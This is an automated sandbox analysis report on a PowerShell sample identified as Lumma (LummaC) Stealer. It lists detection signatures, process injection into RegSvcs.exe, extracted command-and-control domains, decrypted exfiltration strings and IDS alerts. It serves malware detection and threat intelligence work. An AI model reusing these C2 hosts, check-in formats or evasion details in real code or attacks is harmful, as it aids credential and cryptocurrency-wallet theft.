Edit tour

Windows Analysis Report
176.113.115.170.ps1

Overview

General Information

Sample name:	176.113.115.170.ps1
Analysis ID:	1583223
MD5:	979c81c2d61e875e5634a5874d50f402
SHA1:	282f92e764c81121553f2e31035f88e5b0803a01
SHA256:	23aea7e9d32f547db65c086e7d067439588d3f6599f13090679787385bbf2b93
Tags:	176-113-115-170bookingps1SPAM-ITAuser-JAMESWT_MHT
Infos:

Detection

LummaC

Score:	92
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Suricata IDS alerts for network traffic

Yara detected LummaC Stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Injects a PE file into a foreign processes

LummaC encrypted strings found

Sample uses string decryption to hide its real strings

Uses ipconfig to lookup or modify the Windows network settings

Writes to foreign memory regions

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a window with clipboard capturing capabilities

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Change PowerShell Policies to an Insecure Level

Suricata IDS alerts with low severity for network traffic

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

powershell.exe (PID: 4824 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\176.113.115.170.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 5932 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

ipconfig.exe (PID: 1136 cmdline: "C:\Windows\system32\ipconfig.exe" /flushdns MD5: 62F170FB07FDBB79CEB7147101406EB8)

RegSvcs.exe (PID: 3392 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["hummskitnj.buzz", "inherineau.buzz", "screwamusresz.buzz", "rebuildeso.buzz", "scentniej.buzz", "prisonyfork.buzz", "cashfuzysao.buzz", "appliacnesot.buzz"], "Build id": "atxOT1--otstuk"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Sigma Signatures

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\176.113.115.170.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\176.113.115.170.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\176.113.115.170.ps1", ProcessId: 4824, ProcessName: powershell.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\176.113.115.170.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\176.113.115.170.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\176.113.115.170.ps1", ProcessId: 4824, ProcessName: powershell.exe

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-02T09:00:08.530683+0100	2028371	3	Unknown Traffic	192.168.2.6	49712	104.102.49.254	443	TCP
2025-01-02T09:00:09.787755+0100	2028371	3	Unknown Traffic	192.168.2.6	49714	172.67.157.254	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-02T09:00:39.756475+0100	2054653	1	A Network Trojan was detected	192.168.2.6	49714	172.67.157.254	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-02T09:00:39.756475+0100	2049836	1	A Network Trojan was detected	192.168.2.6	49714	172.67.157.254	443	TCP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (appliacnesot .buzz)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-02T09:00:07.855873+0100	2058572	1	Domain Observed Used for C2 Detected	192.168.2.6	58309	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (cashfuzysao .buzz)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-02T09:00:07.866377+0100	2058576	1	Domain Observed Used for C2 Detected	192.168.2.6	50798	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (hummskitnj .buzz)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-02T09:00:07.878042+0100	2058578	1	Domain Observed Used for C2 Detected	192.168.2.6	59889	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (inherineau .buzz)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-02T09:00:07.793920+0100	2058580	1	Domain Observed Used for C2 Detected	192.168.2.6	62245	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (prisonyfork .buzz)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-02T09:00:07.811562+0100	2058584	1	Domain Observed Used for C2 Detected	192.168.2.6	50089	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (rebuildeso .buzz)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-02T09:00:07.821070+0100	2058586	1	Domain Observed Used for C2 Detected	192.168.2.6	58372	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (scentniej .buzz)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-02T09:00:07.832106+0100	2058588	1	Domain Observed Used for C2 Detected	192.168.2.6	62883	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (screwamusresz .buzz)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-02T09:00:07.843556+0100	2058590	1	Domain Observed Used for C2 Detected	192.168.2.6	56792	1.1.1.1	53	UDP

ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-02T09:00:09.101775+0100	2858666	1	Domain Observed Used for C2 Detected	192.168.2.6	49712	104.102.49.254	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 4.2.RegSvcs.exe.400000.0.unpack

Malware Configuration Extractor: LummaC {"C2 url": ["hummskitnj.buzz", "inherineau.buzz", "screwamusresz.buzz", "rebuildeso.buzz", "scentniej.buzz", "prisonyfork.buzz", "cashfuzysao.buzz", "appliacnesot.buzz"], "Build id": "atxOT1--otstuk"}

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.8% probability

Sample uses string decryption to hide its real strings

Source: 00000004.00000002.2498669551.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: hummskitnj.buzz
Source: 00000004.00000002.2498669551.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: cashfuzysao.buzz
Source: 00000004.00000002.2498669551.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: appliacnesot.buzz
Source: 00000004.00000002.2498669551.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: screwamusresz.buzz
Source: 00000004.00000002.2498669551.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: inherineau.buzz
Source: 00000004.00000002.2498669551.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: scentniej.buzz
Source: 00000004.00000002.2498669551.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: rebuildeso.buzz
Source: 00000004.00000002.2498669551.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: prisonyfork.buzz
Source: 00000004.00000002.2498669551.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: inherineau.buzz
Source: 00000004.00000002.2498669551.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000004.00000002.2498669551.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000004.00000002.2498669551.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: - Screen Resoluton:
Source: 00000004.00000002.2498669551.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000004.00000002.2498669551.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: Workgroup: -
Source: 00000004.00000002.2498669551.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: atxOT1--otstuk

Source: unknown	HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.6:49712 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.6:49714 version: TLS 1.2

Source:

Binary string: #.dll.pdb source: powershell.exe, 00000000.00000002.2212974120.000002B3C38F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000000.00000002.2181917236.000002B3AC8B3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2181917236.000002B3AB7F8000.00000004.00000800.00020000.00000000.sdmp

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then lea esi, dword ptr [eax+00000270h]	4_2_00408A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov edx, ebx	4_2_00408600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov byte ptr [edi], al	4_2_0042C850
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then push esi	4_2_0040C805
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx+04h]	4_2_0043C830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov esi, ecx	4_2_004290D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov byte ptr [ebx], al	4_2_0042E0DA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov ecx, eax	4_2_0041D8D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov ecx, eax	4_2_0041D8D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov byte ptr [ebx], al	4_2_0042C0E6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov edx, ecx	4_2_0041B8F6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov edx, ecx	4_2_0041B8F6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov byte ptr [ebx], al	4_2_0042C09E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov eax, ebx	4_2_0041C8A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax-000000BEh]	4_2_0041C8A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+edx+0Ah]	4_2_0041C8A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-2E3D7ACEh]	4_2_0041C8A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov ecx, eax	4_2_0041D8AC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov ecx, eax	4_2_0041D8AC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov byte ptr [ebx], al	4_2_0042C09E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+ecx-16h]	4_2_00441160
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov eax, dword ptr [00446130h]	4_2_00418169
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then cmp byte ptr [esi+ebx], 00000000h	4_2_0042B170
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov ecx, eax	4_2_0042D17D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov ecx, eax	4_2_0042D116
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h	4_2_004281CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h	4_2_004289E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov byte ptr [edi], al	4_2_0042B980
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], 385488F2h	4_2_0043C990
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp edx	4_2_004239B9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then movzx ecx, byte ptr [edx+eax]	4_2_004239B9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then cmp dword ptr [ecx+ebx*8], 385488F2h	4_2_0043CA40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov word ptr [eax], cx	4_2_00421A10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	4_2_00436210
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then dec edx	4_2_0043FA20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	4_2_0042AAC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+0Ah]	4_2_0040AB40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h	4_2_00440340
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov byte ptr [ebx], al	4_2_0042D34A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov ecx, eax	4_2_0041C300
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then dec edx	4_2_0043FB10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov edx, ecx	4_2_00418B1B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then dec edx	4_2_0043FB2A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then dec edx	4_2_0043FB28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h	4_2_004283D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-6E2DD57Fh]	4_2_0041EB80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov eax, ebx	4_2_00427440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+09AD4080h]	4_2_00427440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then movzx edx, byte ptr [eax+edi-74D5A7FEh]	4_2_0042C465
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov byte ptr [ebx], al	4_2_0042C465
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov edi, dword ptr [esi+30h]	4_2_0040CC7A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov word ptr [eax], cx	4_2_0041747D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov word ptr [edx], di	4_2_0041747D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h	4_2_00414CA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then dec edx	4_2_0043FD70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then movzx ecx, byte ptr [esi+eax+61765397h]	4_2_0041B57D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx-16h]	4_2_00440D20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h	4_2_00428528
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov edx, ecx	4_2_00426D2E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then movzx esi, byte ptr [ebp+eax-46h]	4_2_0043EDC1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 2213E57Fh	4_2_0043CDF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx-3ECB279Fh]	4_2_0043CDF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 2213E57Fh	4_2_0043CDF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then cmp dword ptr [ebp+ebx*8+00h], 7F7BECC6h	4_2_0043CDF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov byte ptr [ebx], al	4_2_0042DDFF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov edi, ecx	4_2_0042A5B6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov ecx, eax	4_2_00422E6D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp edx	4_2_00422E6D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then movzx ecx, byte ptr [edx+eax]	4_2_00422E6D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then dec edx	4_2_0043FE00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov byte ptr [ebx], al	4_2_0042DE07
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax-16h]	4_2_004406F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov edx, ecx	4_2_00429E80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then movzx eax, byte ptr [ebp+edi+00000090h]	4_2_00402EB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+20h]	4_2_00427740
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov word ptr [eax], cx	4_2_00416F52
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov ecx, eax	4_2_0042BF13
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov edi, dword ptr [esp+28h]	4_2_00425F1B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax-16h]	4_2_00441720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp eax	4_2_00429739
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp edx	4_2_004237D6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov dword ptr [esp+20h], eax	4_2_00409780

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2058586 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (rebuildeso .buzz) : 192.168.2.6:58372 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058578 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (hummskitnj .buzz) : 192.168.2.6:59889 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058580 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (inherineau .buzz) : 192.168.2.6:62245 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058584 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (prisonyfork .buzz) : 192.168.2.6:50089 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058572 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (appliacnesot .buzz) : 192.168.2.6:58309 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058588 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (scentniej .buzz) : 192.168.2.6:62883 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058576 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (cashfuzysao .buzz) : 192.168.2.6:50798 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058590 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (screwamusresz .buzz) : 192.168.2.6:56792 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.6:49712 -> 104.102.49.254:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49714 -> 172.67.157.254:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49714 -> 172.67.157.254:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: hummskitnj.buzz
Source: Malware configuration extractor	URLs: inherineau.buzz
Source: Malware configuration extractor	URLs: screwamusresz.buzz
Source: Malware configuration extractor	URLs: rebuildeso.buzz
Source: Malware configuration extractor	URLs: scentniej.buzz
Source: Malware configuration extractor	URLs: prisonyfork.buzz
Source: Malware configuration extractor	URLs: cashfuzysao.buzz
Source: Malware configuration extractor	URLs: appliacnesot.buzz

Source: Joe Sandbox View	IP Address: 172.67.157.254 172.67.157.254
Source: Joe Sandbox View	IP Address: 104.102.49.254 104.102.49.254

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49712 -> 104.102.49.254:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49714 -> 172.67.157.254:443

Source: global traffic	HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
